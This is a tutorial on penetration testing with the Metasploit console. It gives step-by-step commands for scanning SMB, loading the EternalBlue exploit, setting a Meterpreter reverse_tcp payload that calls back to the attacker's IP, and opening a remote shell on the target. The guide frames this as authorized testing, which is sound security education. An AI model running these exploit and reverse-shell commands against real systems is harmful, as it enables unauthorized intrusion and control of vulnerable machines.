CTR DOCs DEEP DIVE

A Guide to the Metasploit Framework

The Metasploit Framework is one of the most powerful and widely used tools for penetration testing and vulnerability assessment. It's a platform that contains a massive database of exploits, payloads, and auxiliary modules used by security professionals to test the security of systems in a controlled, authorized manner. This guide provides a step-by-step overview of the ethical hacking workflow using the primary command-line interface, msfconsole.

The Ethical Hacking Workflow with Metasploit

A typical penetration test follows a logical sequence of steps. Metasploit is designed to facilitate this entire process. For this guide, we'll assume we have permission to test a specific machine on our network (the "target").

Step 1: Launching and Getting Oriented

First, you launch the Metasploit console. This is your primary interface for the framework.

$ msfconsole

Once inside, you can use the help command to see a list of core commands. Some of the most important ones to know are:

search [term]: Searches for modules (exploits, scanners, etc.).
use [module_name]: Selects a module to work with.
show options: Displays the settings you need to configure for a selected module.
set [OPTION] [value]: Sets a specific option.
run or exploit: Executes the selected module.

Step 2: Reconnaissance and Scanning

Before you can test a vulnerability, you need to know what services are running on the target. Metasploit has built-in scanner modules for this. For example, you could search for an SMB scanner to see if a machine is sharing files.

msf6 > search type:auxiliary name:smb_version
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.105
msf6 auxiliary(scanner/smb/smb_version) > run

This would scan the target at `192.168.1.105` and attempt to identify the version of the SMB service, which could reveal a potential vulnerability.

Step 3: Finding and Selecting an Exploit

Let's say your scan revealed a service vulnerable to the famous "EternalBlue" exploit. You can use search to find the appropriate module.

msf6 > search eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue

Step 4: Configuring the Exploit and Payload

Once you've selected an exploit, you must configure it. You also need to choose a payload—this is the code that will run on the target machine *after* the exploit is successful. The Meterpreter payload is a powerful, all-purpose choice.

msf6 exploit(...) > show options
msf6 exploit(...) > set RHOSTS 192.168.1.105
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(...) > set LHOST 192.168.1.20 # Your attacking machine's IP
msf6 exploit(...) > show options # Verify all settings are correct

Step 5: Exploitation

With everything configured, you launch the attack. If the target is vulnerable, the exploit will succeed, and the payload will be delivered.

msf6 exploit(...) > exploit

Step 6: Post-Exploitation

If successful, you will be given a "Meterpreter session." This is a remote shell on the target machine, which proves that the vulnerability is real and exploitable. From here, a security professional can perform actions (like running sysinfo to get system information) to assess the level of risk the vulnerability poses.

meterpreter > sysinfo
meterpreter > help

The Defensive Purpose

This entire process is how security professionals and ethical hackers identify, validate, and demonstrate security risks. By proving a vulnerability can be exploited, they provide the necessary evidence for an organization to prioritize and fix the issue before a real attacker can find it.

Resources and Further Reading

Official Metasploit Documentation - The definitive source for all Metasploit knowledge.
Rapid7's Metasploit Cheat Sheet - A fantastic quick-reference guide for common commands.
Metasploit Unleashed - A free, in-depth course from the creators of Kali Linux.